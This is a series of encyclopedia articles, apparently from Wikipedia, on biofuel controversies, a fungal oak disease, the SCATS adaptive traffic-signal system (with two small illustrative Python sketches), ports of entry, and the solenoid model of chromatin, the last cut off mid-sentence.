increased maize prices by 21 percent in 2009, in comparison with what prices would have been had ethanol production been frozen at 2004 levels. A November 2011 study states that biofuels, their production, and their subsidies are leading causes of agricultural price shocks.
The counter-argument includes considerations of the type of corn that is utilized in biofuels, often field corn not suitable for human consumption; the portion of the corn that is used in ethanol, namely the starch portion; and the negative effect that higher prices for corn and grains have on government welfare spending for these products. The "food vs. fuel" or "food or fuel" debate is internationally controversial, with disagreement about how significant the issue is, what is causing it, what its effects are, and what can or should be done about it. The world faces three global crises: energy, food and the environment. Trends in population growth affect each of these: as the world population increases, demand for both energy and food increases as well, putting the energy and food industries in competition over supply. Developing techniques that use food crops for biofuel production, especially in areas of shortage, can worsen the competition between the food and biofuel industries. Harvesting and producing biofuel crops on a large scale can put local food communities at risk, for example by challenging their access to land and to a share of the food supply. If the food economy cannot be kept safe and stable, protocols such as Kyoto cannot meet their purposes and help control emissions. Poverty reduction Researchers at the Overseas Development Institute have argued that biofuels could help to reduce poverty in the developing world, through increased employment, wider economic growth multipliers and by stabilising oil prices (many developing countries are net importers of oil). However, this potential is described as 'fragile', and is reduced where feedstock production tends to be large scale, or causes pressure on limited agricultural resources: capital investment, land, water, and the net cost of food for the poor. With regard to the potential for poverty reduction or exacerbation, biofuels rely on many of the same policy, regulatory or investment shortcomings that impede agriculture as a route to poverty reduction. Since many of these shortcomings require policy improvements at a country level rather than a global one, they argue for a country-by-country analysis of the potential poverty effects of biofuels. This would consider, among other things, land administration systems, market coordination and prioritizing investment in biodiesel, as this 'generates more labour, has lower transportation costs and uses simpler technology'. Also necessary are reductions in the tariffs on biofuel imports regardless of the country of origin, especially given the increased efficiency of biofuel production in countries such as Brazil. Sustainable biofuel production Responsible policies and economic instruments would help to ensure that biofuel commercialization, including the development of new cellulosic technologies, is sustainable. Responsible commercialization of biofuels represents an opportunity to enhance sustainable economic prospects in Africa, Latin America and impoverished Asia. Environmental effects Soil erosion and deforestation Large-scale removal of mature trees, which remove CO2 through photosynthesis far more effectively than sugar cane or most other biofuel feedstock crops, contributes to soil erosion, unsustainable atmospheric greenhouse gas levels, loss of habitat, and a reduction of valuable biodiversity, both on land and in the oceans. Demand for biofuel has led to clearing land for palm oil plantations.
In Indonesia alone, a vast area of forest has been converted to plantations since 1996. A portion of the biomass should be retained onsite to support the soil resource. Normally this will be in the form of raw biomass, but processed biomass is also an option. If the exported biomass is used to produce syngas, the process can be used to co-produce biochar, a low-temperature charcoal used as a soil amendment to increase soil organic matter to a degree not practical with less recalcitrant forms of organic carbon. For co-production of biochar to be widely adopted, the soil amendment and carbon sequestration value of co-produced charcoal must exceed its net value as a source of energy. Some commentators claim that removal of additional cellulosic biomass for biofuel production will further deplete soils. Effect on water resources Increased use of biofuels puts increasing pressure on water resources in at least two ways: water use for the irrigation of crops used as feedstocks for biodiesel production, and water use in the production of biofuels in refineries, mostly for boiling and cooling. In many parts of the world supplemental or full irrigation is needed to grow feedstocks. For example, if in the production of corn (maize) half the water needs of the crop are met through irrigation and the other half through rainfall, about 860 liters of water are needed to produce one liter of ethanol. In the United States, however, only 5-15% of the water required for corn comes from irrigation, while the other 85-95% comes from natural rainfall. In the United States, the number of ethanol factories almost tripled from 50 in 2000 to about 140 in 2008. A further 60 or so are under construction, and many more are planned. Projects are being challenged by residents at courts in Missouri (where water is drawn from the Ozark Aquifer), Iowa, Nebraska, Kansas (all of which draw water from the non-renewable Ogallala Aquifer), central Illinois (where water is drawn from the Mahomet Aquifer) and Minnesota. For example, four ethanol crops (corn, sugarcane, sweet sorghum and pine) yield net energy; however, increasing their production to meet the U.S. Energy Independence and Security Act mandates for renewable fuels by 2022 would take a heavy toll on the states of Florida and Georgia. Sweet sorghum, which performed the best of the four, would increase freshwater withdrawals from the two states by almost 25%. Pollution Formaldehyde, acetaldehyde and other aldehydes are produced when alcohols are oxidized. When only a 10% mixture of ethanol is added to gasoline (as is common in American E10 gasohol and elsewhere), aldehyde emissions increase 40%. However, some study results conflict on this point, and lowering the sulfur content of biofuel mixes lowers the acetaldehyde levels. Burning biodiesel also emits aldehydes and other potentially hazardous aromatic compounds which are not regulated in emissions laws. Many aldehydes are toxic to living cells. Formaldehyde irreversibly cross-links protein amino acids, which produces the hard flesh of embalmed bodies. At high concentrations in an enclosed space, formaldehyde can be a significant respiratory irritant, causing nose bleeds, respiratory distress, lung disease, and persistent headaches. Acetaldehyde, which is produced in the body of alcohol drinkers and found in the mouths of smokers and those with poor oral hygiene, is carcinogenic and mutagenic.
The European Union has banned products that contain formaldehyde, due to its documented carcinogenic characteristics. The U.S. Environmental Protection Agency has labeled formaldehyde as a probable cause of cancer in humans. Brazil burns significant amounts of ethanol biofuel. Gas chromatograph studies were performed of ambient air in São Paulo, Brazil, and compared to Osaka, Japan, which does not burn ethanol fuel. Atmospheric formaldehyde was 160% higher in Brazil, and acetaldehyde was 260% higher. Technical issues Energy efficiency and energy balance Despite occasionally being proclaimed a "green" fuel, first-generation biofuels, primarily ethanol, are not without their own GHG emissions. While ethanol does produce fewer overall GHG emissions than gasoline, its production is still an energy-intensive process with secondary effects. Gasoline generally produces 8.91 kg of CO2 per gallon, compared to 8.02 kg per gallon for E10 ethanol blend and 1.34 kg per gallon for E85 ethanol blend. Based on a study by Dias de Oliveira et al. (2005), corn-based ethanol requires 65.02 gigajoules (GJ) of energy per hectare (ha) and produces approximately 1236.72 kg per ha of carbon dioxide (CO2), while sugar cane-based ethanol requires 42.43 GJ/ha and produces 2268.26 kg/ha of CO2, under the assumption of non-carbon-neutral energy production. These emissions accrue from agricultural production, crop cultivation, and ethanol processing. Once the ethanol is blended with gasoline, it results in carbon savings of approximately 0.89 kg of CO2 per gallon consumed (U.S. D.O.E., 2011a). Economic viability From a production standpoint, miscanthus can produce 742 gallons of ethanol per acre of land, which is nearly twice as much as corn (399 gal/acre, assuming an average yield of 145 bushels per acre under a normal corn-soybean rotation) and nearly three times as much as corn stover (165 gal/acre) and switchgrass (214 gal/acre). Production costs are a big impediment to large-scale implementation of second-generation biofuels, and their market demand will depend primarily on their price competitiveness relative to corn ethanol and gasoline. At the time, costs of conversion of cellulosic fuels, at $1.46 per gallon, were roughly twice those of corn-based ethanol, at $0.78 per gallon. Cellulosic biofuels from corn stover and miscanthus were 24% and 29% more expensive than corn ethanol, respectively, and switchgrass biofuel was more than twice as expensive as corn ethanol. Carbon emissions Biofuels and other forms of renewable energy aim to be carbon neutral or even carbon negative. Carbon neutral means that the carbon released during the use of the fuel, e.g. through burning to power transport or generate electricity, is reabsorbed and balanced by the carbon absorbed by new plant growth. These plants are then harvested to make the next batch of fuel. Carbon neutral fuels lead to no net increases in human contributions to atmospheric carbon dioxide levels, reducing the human contribution to global warming. A carbon negative aim is achieved when a portion of the biomass is used for carbon sequestration. Calculating exactly how much greenhouse gas (GHG) is produced in burning biofuels is a complex and inexact process, which depends very much on the method by which the fuel is produced and other assumptions made in the calculation. The carbon emissions (carbon footprint) produced by biofuels are calculated using a technique called Life Cycle Analysis (LCA).
This uses a "cradle to grave" or "well to wheels" approach to calculate the total amount of carbon dioxide and other greenhouse gases emitted during biofuel production, from putting seed in the ground to using the fuel in cars and trucks. Many different LCAs have been done for different biofuels, with widely differing results. Several well-to-wheels analyses of biofuels have shown that first-generation biofuels can reduce carbon emissions, with savings depending on the feedstock used, and that second-generation biofuels can produce even higher savings when compared to using fossil fuels. However, those studies did not take into account emissions from nitrogen fixation, or additional carbon emissions due to indirect land use changes. In addition, many LCA studies fail to analyze the effect of substitutes that may come into the market to replace current biomass-based products. In the case of Crude Tall Oil (CTO), a raw material used in the production of pine chemicals and now being diverted for use in biofuel, an LCA study found that the global carbon footprint of pine chemicals produced from CTO is 50 percent lower than that of the substitute products used in the same situation, offsetting any gains from utilizing the biofuel to replace fossil fuels. Additionally, the study showed that fossil fuel use is not reduced when CTO is diverted to biofuel use, and that the substitute products consume disproportionately more energy. This diversion would negatively affect an industry that contributes significantly to the world economy, globally producing more than 3 billion pounds of pine chemicals annually in complex, high-technology refineries and providing jobs directly and indirectly for tens of thousands of workers. A paper published in February 2008 in Sciencexpress by a team led by Searchinger from Princeton University concluded that, once the effects of indirect land use change are considered in the life cycle assessment of biofuels used to substitute for gasoline, both corn and cellulosic ethanol, instead of producing savings, increased carbon emissions compared to gasoline by 93 and 50 percent respectively. A second paper published in the same issue of Sciencexpress, by a team led by Fargione from The Nature Conservancy, found that a carbon debt is created when natural lands are cleared and converted to biofuel production, or to crop production when existing agricultural land is diverted to biofuel production; this carbon debt therefore applies to both direct and indirect land use changes. The Searchinger and Fargione studies gained prominent attention in both the popular media and in scientific journals. The methodology, however, drew some criticism: Wang and Haq from Argonne National Laboratory posted a public letter and sent their criticism of the Searchinger paper to Letters to Science. Another criticism, by Kline and Dale from Oak Ridge National Laboratory, was published in Letters to Science. They argued that Searchinger et al. and Fargione et al. "...do not provide adequate support for their claim that biofuels cause high emissions due to land-use change." The U.S. biofuel industry also reacted, claiming in a public letter that the "Searchinger study is clearly a 'worst-case scenario' analysis..." and that this study "relies on a long series of highly subjective assumptions...". Engine design The modifications necessary to run internal combustion engines on biofuel depend on the type of biofuel used, as well as the type of engine. For example, gasoline engines can run without any modification at all on biobutanol.
Minor modifications are, however, needed to run them on bioethanol or biomethanol. Diesel engines can run on the latter fuels, as well as on vegetable oils (which are cheaper); however, running on vegetable oil is only possible when the engine is equipped with indirect injection, so engines without indirect injection need to be fitted with it. Campaigns A number of environmental NGOs campaign against the production of biofuels as a large-scale alternative to fossil fuels. For example, Friends of the Earth state that "the current rush to develop agrofuels (or biofuels) on a large scale is ill-conceived and will contribute to an already unsustainable trade whilst not solving the problems of climate change or energy security". Some mainstream environmental groups support biofuels as a significant step toward slowing or stopping global climate change. However, supportive environmental groups generally hold the view that biofuel production can threaten the environment if it is not done sustainably. This finding has been backed by reports of the UN, the IPCC, and some other smaller environmental and social groups, such as the EEB and the Bank Sarasin, which generally remain negative about biofuels. As a result, governmental and environmental organizations are turning against biofuels made in a non-sustainable way (preferring certain oil sources such as jatropha and lignocellulose over palm oil) and are asking for global support for this. In addition to supporting these more sustainable biofuels, environmental organizations are redirecting attention to new technologies that do not use internal combustion engines, such as hydrogen and compressed air. Several standard-setting and certification initiatives have been set up on the topic of biofuels. The "Roundtable on Sustainable Biofuels" is an international initiative which brings together farmers, companies, governments, non-governmental organizations, and scientists who are interested in the sustainability of biofuels production and distribution. During 2008, the Roundtable was developing a series of principles and criteria for sustainable biofuels production through meetings, teleconferences, and online discussions. In a similar vein, the Bonsucro standard has been developed as a metric-based certificate for products and supply chains, as a result of an ongoing multi-stakeholder initiative focussing on the products of sugar cane, including ethanol fuel. The increased manufacture of biofuels will require increasing land areas to be used for agriculture. Second- and third-generation biofuel processes can ease the pressure on land, because they can use waste biomass and existing (untapped) sources of biomass such as crop residues and potentially even marine algae. In some regions of the world, a combination of increasing demand for food and increasing demand for biofuel is causing deforestation and threats to biodiversity. The best reported example of this is the expansion of oil palm plantations in Malaysia and Indonesia, where rainforest is being destroyed to establish new oil palm plantations. Notably, however, 90% of the palm oil produced in Malaysia is used by the food industry; biofuels therefore cannot be held solely responsible for this deforestation. There is a pressing need for sustainable palm oil production for the food and fuel industries; palm oil is used in a wide variety of food products. The Roundtable on Sustainable Biofuels is working to define criteria, standards and processes to promote sustainably produced biofuels.
Palm oil is also used in the manufacture of detergents, and in electricity and heat generation both in Asia and around the world (the UK burns palm oil in coal-fired power stations to generate electricity). Significant area is likely to be dedicated to sugar cane in future years as demand for ethanol increases worldwide. The expansion of sugar cane plantations will place pressure on environmentally sensitive native ecosystems, including rainforest in South America. In forest ecosystems, these effects will themselves undermine the climate benefits of alternative fuels, in addition to representing a major threat to global biodiversity. Although biofuels are generally considered to improve net carbon output, biodiesel and other fuels do produce local air pollution, including nitrogen oxides, the principal cause of smog. See also Agflation Environmental impact of aviation Social and environmental impact of palm oil Environmental issues with energy Indirect land use change impacts of biofuels List of environmental issues External links Roundtable on Sustainable Biofuels - The Roundtable on Sustainable Biofuels Announces Version Zero of our Sustainability Standard World Bank, Biofuels: The Promise and the Risks. World Development Report 2008: Agriculture for Development Biofuels Aren't Really Green - by Deepak Divan, Frank Kreikebaum, Institute of Electrical and Electronics Engineers, Spectrum, November 2009 Global Trade and Environmental Impact Study of the EU Biofuels Mandate by the International Food Policy Institute (IFPRI), March 2010
Issues relating to biofuels
https://en.wikipedia.org/wiki/Botryosphaeria%20corticola
Bot canker of oak is a disease of the stems, branches and twigs of oak trees in Europe and North America. The causal agent of Bot canker of oak is the fungus Botryosphaeria corticola. Bot canker of oak causes lesions and cankers on a wide range of oaks in Europe and, most recently, on live oaks in North America. Some infections were formerly attributed to Botryosphaeria stevensii, but most likely represent infections by Botryosphaeria corticola. Botryosphaeria corticola is distinguishable from Botryosphaeria stevensii via ITS rDNA sequencing. Overview Botryosphaeria corticola has caused infection of oak trees in Spain, Portugal, Morocco, Italy, Greece, Hungary, and the United States. Bot canker of oak kills trees in natural forests as well as in cork plantations. The cork industry in Portugal, Spain, France, Italy, and Morocco has been dealing with declining oaks for several years from biotic and abiotic factors. This disease has been seen in many cork plantations and is the most important contributor to the decline of the cork industry. When cork is harvested from the trees, the cork cambium is exposed, creating a wound through which the fungus can enter the trunk and cause disease. Infection of other oaks is most likely through wounds as well. These may be natural wounds, but there is evidence that insect damage is involved, especially in coast live oak in California. Botryosphaeria corticola infects the twigs, branches and stems of oaks and degrades the cambial tissues. With the degradation of vascular tissues, the trees display wilting and dieback symptoms. Hosts Europe/North Africa Cork oak (Quercus suber) Holm oak (Quercus ilex) Kermes oak (Quercus coccifera) Sessile oak (Quercus petraea) North America White oak (Quercus alba) Canyon live oak (Quercus chrysolepis) Coast live oak (Quercus agrifolia) Laurel oak (Quercus laurifolia) Live oak (Quercus virginiana) Grape (Vitis sp.) Management Botryosphaeria corticola can be managed in high-value trees, but there is no current management for forest trees. Carbendazim and thiophanate-methyl have been shown to prevent infection in cork oak in Europe, where they are applied after cork has been harvested. Sanitation is the most common management technique for this disease: branches with diseased tissue are pruned off, and heavily infected trees are removed. This prevents future infections by limiting the number of spores in the area. Description Botryosphaeria corticola (Diplodia corticola) is an ascomycete fungus. It has both asexual (Diplodia corticola) and sexual (Botryosphaeria corticola) reproductive stages occurring naturally. The asexual spores (conidia) are produced in pycnidia from conidiogenous cells, without conidiophores. Pycnidia are dark brown to black, circular, immersed, partially erumpent and up to 1 mm in diameter. The sexual spores are biseriate ascospores, eight of which occur inside each ascus; the asci occur in immersed, partially erumpent, dark brown to black pseudothecia, up to 1 mm in diameter.
Botryosphaeria corticola
https://en.wikipedia.org/wiki/Sydney%20Coordinated%20Adaptive%20Traffic%20System
The Sydney Coordinated Adaptive Traffic System, abbreviated SCATS, is an intelligent transportation system that manages the dynamic (on-line, real-time) timing of signal phases at traffic signals, meaning that it tries to find the best phasing (i.e. cycle times, phase splits and offsets) for the current traffic situation, both for individual intersections and for the whole network. SCATS is based on automatic selection of plans from a library in response to the data derived from loop detectors or other road traffic sensors. SCATS uses sensors at each traffic signal to detect vehicle presence in each lane and pedestrians waiting to cross at the local site. The vehicle sensors are generally inductive loops installed within the road pavement; these are unable to detect bicycles. The pedestrian sensors are usually push buttons. Various other types of sensors can be used for vehicle presence detection, provided that a similar and consistent output is achieved. Information collected from the vehicle sensors allows SCATS to calculate and adapt the timing of traffic signals in the network. SCATS is installed at about 55,000 intersections in over 180 cities in 28 countries. In Australia, where the system was first developed, the majority of signalised intersections are SCATS operated (around 11,000). The SCATS system is owned by the Australian state of New South Wales, whose state capital is Sydney. In December 2019, Transport for NSW, the transport and road agency in New South Wales, began to look into commercialising the SCATS system. Features Default operation The architecture of SCATS has two basic levels, LOCAL and MASTER. The LOCAL is the control cabinet at the roadside, which provides the normal signal control as well as processing of traffic information deduced from the vehicle detectors. The MASTER is a remote computer which provides area-based traffic control, i.e. area traffic control (ATC) or urban traffic control (UTC). Detailed traffic signal and hardware diagnostics are passed from the LOCAL to the MASTER, with the ability to notify staff when a traffic signal has a fault. SCATS is able to operate over PAPL, ADSL, PSTN and 3G IP network connections to each intersection. SCATS can also operate on a network of private cables not requiring third-party telecommunications support, and large parts of inner Sydney have always operated this way. Priority levels Public vehicle priority in SCATS (using data provided by PTIPS) caters for both buses and trams. SCATS has a facility to provide three levels of priority: High – In the high priority mode the "hurry call" facility is used (i.e. the phase needed by a bus, tram or emergency vehicle is called immediately, skipping other phases if necessary) Medium (Flexible window) – Phases can be shortened to allow the bus/tram phase to be brought in early. The bus/tram phase can occur at more than one place in the cycle. Low – takes its turn. Trams would normally be given high priority, the aim of which is to get the tram through without it stopping. Buses would normally expect to receive a medium level of priority. Instant fault detection and quick repair The ATC system detects and logs faults in order to facilitate repair and maintenance. Should there be a telecommunications breakdown, the ATC junction controller concerned will switch to standalone mode and continue to function.
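The three priority levels lend themselves to a simple illustration. The sketch below is a toy model of the dispatch logic described above, not SCATS code: the function, class names and simplified phase list are hypothetical, and real controllers handle timing, safety interlocks and network coordination that are omitted here.

```python
from enum import Enum

class Priority(Enum):
    HIGH = 1    # "hurry call": call the needed phase immediately
    MEDIUM = 2  # flexible window: shorten phases to bring the phase in early
    LOW = 3     # takes its turn in the normal cycle

def next_phase(cycle, current_index, requested_phase, priority):
    """Return the index of the next phase to serve (toy model)."""
    if priority is Priority.HIGH:
        # Hurry call: jump straight to the requested phase,
        # skipping intervening phases if necessary.
        return cycle.index(requested_phase)
    # MEDIUM would keep the phase order but shorten the remaining
    # phases so the requested phase starts earlier (not modelled here);
    # LOW simply advances to the next phase in the cycle.
    return (current_index + 1) % len(cycle)

# Example: a tram (HIGH) approaching while phase "B" is running.
cycle = ["A", "B", "C", "D"]  # hypothetical phase sequence
print(next_phase(cycle, 1, "D", Priority.HIGH))  # -> 3 (skips "C")
print(next_phase(cycle, 1, "D", Priority.LOW))   # -> 2 (waits its turn)
```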
Traffic Adaptive Operation ATC systems provide an advanced method of traffic signal control called traffic adaptive control, in which the operational timing plans, including cycle length, splits and offsets, are continuously reviewed and modified in small increments, almost on a cycle-by-cycle basis, to match the prevailing demand measured by the detectors connected to the on-street traffic controllers. SCATS Ramp Metering System The SCATS Ramp Metering System (SRMS) is a SCATS subsystem that controls traffic signals at motorway entries and integrates with SCATS intersection control, promoting integrated real-time management of the traffic corridor as a whole. The objective of SRMS, based on current traffic conditions, is to efficiently determine: When ramp metering signals start and end ramp metering operation The metering flow rates of the operating ramp metering signals Which actions shall be taken at signalised intersections of the corridor to promote network-wide benefits. SRMS achieves these objectives by implementing a collection of pre-configured adaptive intelligent strategies, either automatically or manually. In manual mode, the SRMS operator can create new rules or manipulate existing ones in order to adjust the ramp metering system for effective operation during any planned or unplanned events (e.g. incidents). SRMS is a distributed control system that operates on a central control server and road-side traffic controllers. The central control server is a component of SCATS and inherently provides integrated motorway and arterial real-time management. The road-side controllers are installed on motorway on-ramps and are used to: Set the traffic signal times Set the state of on-ramp changeable signs Manage the sequences that start and end ramp metering operation; and Measure traffic states using vehicle detectors. Metering rates are determined by the local traffic signal controller or by the central control server. Metering rates can be determined in two ways: adaptive operation, or time-of-day-based operation, typically used when a communications failure or a critical vehicle detector failure takes place. The adaptive operation optimises the mainline traffic state by using real-time data from vehicle detector stations installed at several mainline locations, at ramps and optionally at arterial roads. The adaptive operation determines control actions at 10-second intervals and applies some or all of the following strategies simultaneously: Coordinated ramp metering Ramp queue management Automatic begin and end of ramp metering operation Variation routines for integration with SCATS intersection control Variation routines for automated incident responses and unusual circumstances Manual controls for incident responses and unusual circumstances Critical lane occupancy calibration Fault-tolerant strategies Data logging for performance reporting and off-line analysis SRMS is currently used as the Auckland ramp metering system. Simulation SCATS can be simulated in-the-loop (SCATSIM) using third-party traffic simulation tools. SCATSIM offers an interface supported by Aimsun, PTV VISSIM, Quadstone Paramics and Commuter. SCATSIM offers kerb-side hardware and firmware emulation that interfaces seamlessly to the SCATS Region and Central Manager, offering the same control strategies used in field deployments for both intersections and ramp metering (SRMS). The configuration files prepared by authorities for the Central Manager, Region, SRMS and kerb-side controllers can be re-used without modification by SCATSIM.
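The adaptive, feedback-driven calculation of metering rates described for SRMS above can be illustrated with the classic ALINEA feedback law from the ramp metering literature. This is a generic sketch of the approach rather than SRMS's own (unpublished) algorithm; the gain, rate bounds, target occupancy and sample values below are invented for illustration.

```python
def alinea_rate(prev_rate, occupancy_pct, target_pct=25.0,
                gain=70.0, min_rate=200.0, max_rate=1800.0):
    """One feedback update of the ramp metering rate (vehicles/hour).

    ALINEA (Papageorgiou et al.): raise the rate when measured downstream
    occupancy is below the target, lower it when above. The gain is in
    vehicles/hour per percentage point of occupancy error.
    """
    rate = prev_rate + gain * (target_pct - occupancy_pct)
    return max(min_rate, min(max_rate, rate))

# Example: a congested mainline (occupancy above the 25% target),
# updated at fixed intervals as new detector measurements arrive.
rate = 900.0
for occ in (31.0, 28.0, 24.0):
    rate = alinea_rate(rate, occ)
    print(round(rate))  # 480, 270, 340 -- throttled, then recovering
```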
When Commuter software was acquired by Autodesk, Azalient Ltd support for the Commuter interface was deprecated. Azalient Ltd also developed a plugin that enabled the Quadstone Paramics interface to SCATSIM; this plugin is also deprecated. History SCATS was developed in Sydney, Australia by the New South Wales Department of Main Roads (a predecessor of Transport for NSW) in the 1970s. It began to be used in Melbourne in 1982, Adelaide, South Australia in 1982 and Western Australia in 1983. It is also used in New Zealand, Hong Kong, Shanghai, Guangzhou, Amman, Tehran, Dublin, Rzeszów, Gdynia, Central New Jersey, in part of Metro Atlanta, and Cebu City, among several other places. In Hong Kong, SCATS is currently adopted in the area traffic control systems on Hong Kong Island and in Kowloon, Tsuen Wan and Shatin. The system may be referred to by an alternative name in a specific installation; however, for deployments outside Australia, New Zealand and Singapore, localised names do not appear to be commonly used. The following are some local alternative names that have been or are in use: Canberra "CATSS" (Canberra Automated Traffic Signal System) Melbourne "SCRAM" (Signal Co-ordination for Regional Areas of Melbourne) Adelaide "ACTS" (Adelaide Co-ordinated Traffic Signals) Perth "PCATS" Singapore "GLIDE" Northern Territory "DARTS" SCATS is a recognised worldwide market leader in intelligent transport systems. Transport for NSW is continuing to develop SCATS to meet emerging technological, user and traffic demands. See also PTIPS - works together with SCATS to provide transport vehicles with priority at traffic signals Other intelligent transportation systems include: STREAMS BLISS Inductive loop vehicle detection External links Roads ACT Roads and Maritime Services, NSW SCATS - Sydney Coordinated Adaptive Traffic System Website SCATS - Main Roads Western Australia Traffic Lights in NSW - Roads and Maritime Services Website RTA and SCATS at the 17th ITS World Congress in Korea Review of Bus Priority at Traffic Signals around the World
Sydney Coordinated Adaptive Traffic System
https://en.wikipedia.org/wiki/Port%20of%20entry
In general, a port of entry (POE) is a place where one may lawfully enter a country. It typically has border security staff and facilities to check passports and visas and to inspect luggage to assure that contraband is not imported. International airports are usually ports of entry, as are road and rail crossings on a land border. Seaports can be used as ports of entry only if a dedicated customs presence is posted there. The choice of whether to become a port of entry is up to the civil authority controlling the port. Airport of entry An airport of entry (AOE) is an airport that provides customs and immigration services for incoming flights. These services allow the airport to serve as an initial port of entry for foreign visitors arriving in a country. Terminology The word "international" in an airport's name usually means that it is an airport of entry, but many airports of entry do not use it. Airports of entry can range from large urban airports with heavy scheduled passenger service, like John F. Kennedy International Airport, to small rural airports serving general aviation exclusively. Often, smaller airports of entry are located near an existing port of entry such as a bridge or seaport. On the other hand, some former airports of entry have chosen to keep the word "international" in their names even though they no longer serve international flights. One example is Osaka International Airport, which kept its original name even after it ended all international services and became a purely domestic airport following the opening of Kansai International Airport in 1994. Several airports in the region are in a similar situation, such as Taipei Songshan Airport: Songshan retained its official Chinese name, Taipei International Airport, after Chiang Kai-shek International Airport (now Taiwan Taoyuan International Airport) opened. Similar transitions have occurred at international airports serving Seoul, Tokyo, Nagoya, Shanghai, Hong Kong, Bangkok, Tehran and elsewhere. For the European Union, flights between countries in the Schengen Area are considered domestic with regard to passport and immigration checks. Several international airports have only intra-Schengen flights, and several of these have occasional charter flights to countries outside the area. Stateless persons Some cases of statelessness have occurred at airports of entry, forcing people to live in the airport for an extended period. One of the most famous cases was that of Mehran Karimi Nasseri, an Iranian national who lived in Charles de Gaulle Airport in France for approximately eighteen years after being denied entry into France and having no country of origin to be returned to, as he claimed his Iranian nationality had been revoked. Nasseri's experience was loosely adapted into two films, the 1993 film Tombés du ciel and the 2004 film The Terminal. Zahra Kamalfar, an Iranian national who attempted to travel to Canada via Russia and Germany using forged documents, lived in Sheremetyevo International Airport in Russia for eleven months before being granted refugee status by Canada to reunite with her family in Vancouver. In the United States The formal definition of a port of entry in the United States is something entirely different. According to the Code of Federal Regulations, "the terms 'port' and 'port of entry' incorporate the geographical area under the jurisdiction of a port director."
In other words, a port of entry may encompass an area that includes several border crossings, as well as some air and sea ports. This also means that not every border crossing is a port of entry, for two reasons: every port of entry must have a Port Director, which is a higher pay grade than a typical border inspector, and the U.S. government has determined that some small border crossings do not need their own Port Directors. As a result, border outposts like Churubusco, Chateaugay and Fort Covington, New York are considered "stations" within the Trout River Port of Entry. Historically, many roads entering the U.S. had no border inspection station. Before September 11, 2001, it was permissible for persons entering the U.S. to do so at any point (including back roads or closed border stations), as long as they proceeded directly to an open border inspection station. In fact, the U.S. Customs Service and U.S. Immigration and Naturalization Service routinely rented property in houses, post offices, and storefronts far from the physical border, and people entering the U.S. were expected to travel to these locations without stopping so they could make their declarations. This policy has since changed, and most of the roads entering the U.S. at locations other than an open and staffed border inspection station have since been barricaded. Variations In some countries, immigration procedures are carried out by the armed forces rather than by specific immigration officers. In most countries, however, the levying of duty on imports is still carried out by customs officers. Immigration clearance at some ports of entry has automated sections open to the country's own residents or citizens, such as the e-Channel found in Hong Kong and Macau, Global Entry found at some airports in the United States, and other similar country-instituted programs. On some international borders, the concept of a port of entry does not exist, or is at least not applied between select countries with free-crossing pacts: travelers may cross the border wherever and whenever convenient. For example, under one such pact, most EU citizens may travel freely within the Schengen Area, which is made up of 29 European countries. In some cases, such free travel may be restricted to citizens of specific countries and to travelers who are not carrying goods over the customs limits; others may only cross the border at a designated border crossing during its opening times. See also Border Border checkpoint Border control Customs Schengen Agreement
Port of entry
https://en.wikipedia.org/wiki/Solenoid%20%28DNA%29
The solenoid structure of chromatin is a model for the structure of the 30 nm fibre. It is a secondary chromatin structure which helps to package eukaryotic DNA into the nucleus. Background Chromatin was first discovered by Walther Flemming, who used aniline dyes to stain it. In 1974, Roger Kornberg first proposed that chromatin was based on a repeating unit of a histone octamer and around 200 base pairs of DNA. The solenoid model was first proposed by John Finch and Aaron Klug in 1976. They used electron microscopy images and X-ray diffraction patterns to determine their model of the structure. This was the first model to be proposed for the structure of the 30 nm fibre. Structure DNA in the nucleus is wrapped around nucleosomes, which are histone octamers formed of core histone proteins: two histone H2A-H2B dimers, two histone H3 proteins, and two histone H4 proteins. The primary chromatin structure, the least-packed form, is the 11 nm, or "beads on a string", form, where DNA is wrapped around nucleosomes at relatively regular intervals, as Roger Kornberg proposed. Histone H1 protein binds to the site where DNA enters and exits the nucleosome, stabilising the nucleosome and the 147 base pairs of DNA wrapped around the histone core; this structure is a chromatosome. In the solenoid structure, the nucleosomes fold up and are stacked, forming a helix. They are connected by bent linker DNA which positions sequential nucleosomes adjacent to one another in the helix. The nucleosomes are positioned with the histone H1 proteins facing toward the centre, where they form a polymer. Finch and Klug determined that the helical structure had only one start because they mostly observed a small pitch of about 11 nm, which is roughly the diameter of a nucleosome. There are approximately 6 nucleosomes in each turn of the helix. Finch and Klug actually observed a wide range of nucleosomes per turn, but they put this down to flattening. Finch and Klug's electron microscopy images lacked visible detail, so they were unable to determine helical parameters other than the pitch. More recent electron microscopy images have been able to define the dimensions of solenoid structures and have identified the solenoid as a left-handed helix. The structure of solenoids is insensitive to changes in the length of the linker DNA. Function The solenoid structure's most obvious function is to help package the DNA so that it is small enough to fit into the nucleus. This is a big task, as the nucleus of a mammalian cell has a diameter of approximately 6 μm, whilst the DNA in one human cell would stretch to just over 2 metres long if it were unwound. The "beads on a string" structure compacts DNA about 7-fold; the solenoid structure increases this to about 40-fold. DNA compacted into the solenoid structure can still be transcriptionally active in certain areas. The secondary chromatin structure is nonetheless important for transcriptional repression, as in vivo active genes are assembled into large tertiary chromatin structures. Formation There are many factors that affect whether the solenoid structure will form or not. Some factors alter the structure of the 30 nm fibre, and some prevent it from forming in that region altogether. The concentration of ions, particularly divalent cations, affects the structure of the 30 nm fibre, which is why Finch and Klug were not able to form solenoid structures in the presence of chelating agents.
There is an acidic patch on the surface of histone H2A and histone H2B proteins which interacts with the tails of histone H4 proteins in adjacent nucleosomes. These interactions are important for solenoid formation. Histone variants can affect solenoid formation; for example, H2A.Z is a histone variant of H2A with a more acidic patch than that of H2A, so H2A.Z would interact more strongly with histone H4 tails and probably contributes to solenoid formation. The histone H4 tail is essential for formation of 30 nm fibres. However, acetylation of core histone tails affects the folding of chromatin by destabilising interactions between the DNA and the nucleosomes, making histone modification a key factor in solenoid structure. Acetylation of H4K16 (the lysine 16 residues from the N-terminus of histone H4) inhibits 30 nm fibre formation. To decompact the 30 nm fibre, for instance to transcriptionally activate it, both H4K16 acetylation and removal of the histone H1 proteins are required. Further packaging Chromatin can form a tertiary chromatin structure and be compacted even further than the solenoid structure by forming supercoils, which have a diameter of around 700 nm. This supercoil is formed by regions of DNA called scaffold/matrix attachment regions (SMARs) attaching to a central scaffolding matrix in the nucleus, creating loops of solenoid chromatin between 4.5 and 112 kilobase pairs long. The central scaffolding matrix itself forms a spiral shape for an additional layer of compaction. Alternative models Several other models have been proposed, and there is still a lot of uncertainty about the structure of the 30 nm fibre; even recent research produces conflicting information. Electron microscopy measurements of the 30 nm fibre's dimensions impose physical constraints that can only be modelled with a one-start helical structure like the solenoid. They also show that there is no linear relationship between the length of the 